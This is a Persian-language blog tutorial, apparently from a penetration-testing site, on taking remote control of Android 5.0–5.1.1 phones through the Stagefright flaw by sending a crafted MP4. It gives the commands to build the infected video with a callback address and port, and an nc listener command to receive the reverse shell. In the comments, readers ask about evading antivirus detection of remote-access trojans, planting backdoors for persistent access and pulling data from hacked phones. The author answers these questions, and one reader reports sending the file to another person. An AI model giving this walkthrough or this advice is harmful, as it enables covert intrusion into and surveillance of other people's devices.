نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو

نفوذ به اندروید

اموزش نفوذ به اندروید فقط با ارسال یک ویدیو (فرمت MP4) و با استفاده از اسیب پذیری Stagefright با ما در ادامه این اموزش هک و امنیت همراه باشید

نفوذ به اندروید با ارسال ویدیو و امنیت

سیستم عامل اندروید یکی از بهترین و محبوب ترین سیستم عامل های موبایل در جهان است به همین دلیل متخصصان امنیتی زیادی
بر روی امنیت اندروید کار میکنند اما اسیب پذیری هایی وجود دارند که بعد از انتشار اخرین نسخه منتشر میشوند تا هر چه سریع تر نسبت به رفع ان اقدام شود
بسیاری بعد از تهیه دستگاه اندرویدی خود اقدام به اپدیت و رفع این اسیب پذیری ها نمیکنند
یا شرکت های تولید کننده اپدیتی برای دستگاه قدیمی یا جدید ارائه نمیدهند 
پس اسیب پذیری در بسیاری از دستگاه ها باقی میمانند و هکرا با استفاده از ان حفره های امنیتی اقدام به نفوذ میکنند
یکی از این اسیب پذیری های خطرناک به نام Stagefright است که نفوذگر میتواند با ارسال یک ویدیو به کاربر دسترسی کنترل از راه ذور بگیرد 
که در ادامه با نحوه استفاده با این حفذره امنیتی اشنا میشوید
 

اسیب پذیری Stagefright

Stagefright یک حفره امنیتی در سیستم عامل اندرید از نوع باگ RCE است 
که همانطور که گفته شد با اجرای یک فایل ویدیو ای با پسورند .mp4 دسترسی کنترل از راه دور به نفوذگر میدهد
اکسپلویت این اسیب پذیری به صورت عمومی منتشر شده است و میتواند اندروید 5.0 < 5.1.1 را مورد نفوذ قرار دهد
میتوانید فایل اکسپلویت را از اخر اموزش به صورت مستقیم دانلود کنید یا از سایت exploit-db.com دریافت کنید
نکته : در این اموزش برای نفوذ به اندروید از لینوکس استفاده میکنیم اما میتوانید با نصب پایتون در هر سیستم عاملی مانند ویندوز استفاده کنید
وارد ترمینال شوید و به مسیری که فایل پایتون اکسپلویت را قرار داده اید بروید
حال اکسپلویت را اجرا کنید تا سویچ ها و راهنمای ان را ببینید

python 38124.py

نفوذ به اندروید با ارسال ویدیو

ساخت فایل الوده MP4

حال برای ساخت فایل ویدیو ای الوده به دستور زیر توجه کنید

python 38124.py -c 127.0.0.1 -p 6060 -o PentestCore.mp4

نفوذ به اندروید step 2
با استفاده از python فایل اکسپلویت 38124.py را اجرا کرده ایم 
با سویچ -c ادرس ip سرور خود که میخواهید اتصال دستگاه کلاینت به ان برقرار شود را وارد کنید
یک پورت شبکه را برای اتصال به دلخواه انتخاب کنید ما با استفاده از سویچ -p پورت 6060 را انتخاب کرده ایم
و برای گرفتن خروجی سویچ -o را وارد کنید و سپس نام فایل را با فرمت .mp4 وارد کنید
که ما PentestCore.mp4 وارد کرده ایم این فایل خروجی است که باید به کلاینت خود بدهید تا اجرا کنید
بعد از اجرا فایل ساخته شده توسط کاربر نفوذ به اندروید انجام شده و اتصال به سرور شما بر قرار میشود 
برای برقراری این اتصال باید پورت 6060 را که انتخاب کرده بودید در سرور خود باز کنید و منتظر اجرای ویدیو توسط کلاینت شوید 
NC ابزاری مناسب برای باز کردن پورت است که در کالی لینوکس به صورت پیشفرض وجود دارد 
میتوانید اموزش استفاده از نت کت (nc) را در PentestCore مشاهده کنید
در nc را با سویچ های زیر اجرا کنید تا پروت مورد نظر شما بر روی سیسستم باز شود

nc -v -l -p 6060

نفوذ به اندروید step 3
بعد از اجرای فایل ویدو ای دستگاه به صورت ریموت به سرور شما از طریق nc متصل میشود و میتوانید دستورات خود را بر روی دستگاه وارد کنید
 

  استخراج اطلاعات ایمیل با ابزار گرافیکی iKy

آموزش ویدیو ای


 

دریافت لینک دانلود



[ برای دریافت فایل وارد شوید و یا ثبت نام کنید! ]

امیدواریم از این اموزش نفوذ به اندروید لذت برده باشید
موفق باشید. 

5/5 ( 1 نظر )

نیما حسینی هستم بنیان گذار تیم پن تست کور ، مدرس دوره های تست نفوذ و امنیت

مطالب مرتبط

۱۸ دیدگاه در “نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو”

  • سینا نادری مارس 17, 2019 پاسخ

    سلام یه سوال داشتم در رابطه با رات های اندرویدی
    آیا راهی هست که گوشی نتونه رات رو شناسایی کنه چون هنگام نصب رات مثل اسپای نوت گوشی پیغام میده که برنامه مخربه و به دستگاه آسیب میزنه

    • Nima Nani مارس 19, 2019 پاسخ

      درود
      بله راه هایی وجود دارد که باید برنامه نویسی بلد باشید و تغیراتی در کد نویسی فایل دهید

  • milani97 مارس 18, 2019 پاسخ

    سلام من مراحل بالا رو به ترتیب انجام دادم ولی وقتی دستور sudo python 38124.py رو اجرا میکنم خطای زیر رو نشون میده
    با ابونتو البته تست کردم
    File “38124.py”, line 8
    SyntaxError: Non-ASCII character ‘\xe2’ in file 38124.py on line 8, but no encoding declared; see python. org/dev/peps/pep-0263/ for details

    • Nima Nani مارس 19, 2019 پاسخ

      درود
      فایل را به صورت مستقیم از PentestCore دریافت کنید و نام ان را به mp4.py تغیر بدین مشکل حل میشود
      اموزش ویدیو ای را حتما مشاهده کنید تمام این نکات گفته شده
      موفق باشید

  • rootkali52 مارس 19, 2019 پاسخ

    سلام خسته نباشید.. همون چیزایی که گفتید انجام دادم ولی کار نکرد.. برا طرفم فرستادم

    • Nima Nani مارس 19, 2019 پاسخ

      درود تشکر از شما
      احتمالا دستگاه اندرویدی طرف مقابل شما از اندروید ۵ استفاده نمیکند داخل اموزش گفته شده دقیقا چه نسخه هایی از اندروید این اسیب پذیری را دارند
      و یا احتمالا مشکل ip دارید باید از سرور مجازی استفاده کنید یا پورت فورواردیتگ انجام دهید

  • 563694 آوریل 23, 2019 پاسخ

    سلام اموزش رو نمیشه با تروموکس انجام داد؟

    • Nima Nani آوریل 26, 2019 پاسخ

      درود
      اگر مشکل اتصال نداشته باشید میتوانید داخل ترموکس هم انجام دهید

  • علی آوریل 25, 2019 پاسخ

    این برای لینوکسه توی تروموکس نمیشه ازش استفاده کرد؟؟؟؟

    • Nima Nani آوریل 26, 2019 پاسخ

      درود
      اگر مشکل شبکه و اتصال نداشته باشید میتوانید در ترموکس هم انجام دهید

  • 563694 آوریل 28, 2019 پاسخ

    سلام داداش منظورت از (مشکل شبکه و اتصال نداشته باشید) چیه؟ برای استفاده در تروموکس؟

    • Nima Nani می 2, 2019 پاسخ

      درود
      شما باید ای پی ثابت داشته باشید و شبکه شما به صورت bridge باشد که در دستگاه های خانگی به این صورت نمیباشد

  • Root ژوئن 10, 2019 پاسخ

    سلام و خسته نباشید میخواستم بدونم کد کی بخوام از داخل گوشی اون کسی که هک شده بکشم بیرون چجوری باید تو لینوکس وارد کنم ممنون میشم جوابم را بدید

    • Nima Nani جولای 11, 2019 پاسخ

      درود
      بعد از دسترسی میتوانید بکدور خود را بریزید و دسترسی کامل بگیرید. منظورتون از کد خیلی ناواضح است

  • علی جولای 6, 2019 پاسخ

    سلام ببخشید چطور میشه اتصال رو بعد از خاموش کردن کالی حفظ کرد

    • Nima Nani جولای 11, 2019 پاسخ

      درود
      میتوانید برای اتصال دائم یک بکدور بر روی دستگاه بگذارید تا بتوانید به صورتی که میخواهید با هر سیستمی متصل شوید

  • mohammad جولای 21, 2019 پاسخ

    سلام خسته نباشید .
    میشه ازتون خواهش کنم که آموزش کامل مرحله به مرحله تا زمانیکه اتصال دائم میگیرید رو اموزش بدید.مبحث پورت فورواردینگ و بکدور خیلی مهمه
    ایا میشه از Ngrok برای پورت فورواردینگ استفاده کرد و اینکه اگه میشه از کدوم حالت http یاtcp
    واینکه این باگ هنوزم کار میکنه حتی اگه نسخه اندروید ۵ یا ۵.۱ باشه

    • Nima Nani آگوست 17, 2019 پاسخ

      درود تشکر
      بله در صورت امکان این اموزش را قرار خواهیم داد
      بله این باگ در نسخه های پچ نشده اندروید ۵ و ۵.۱ همچنان کار میکند

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *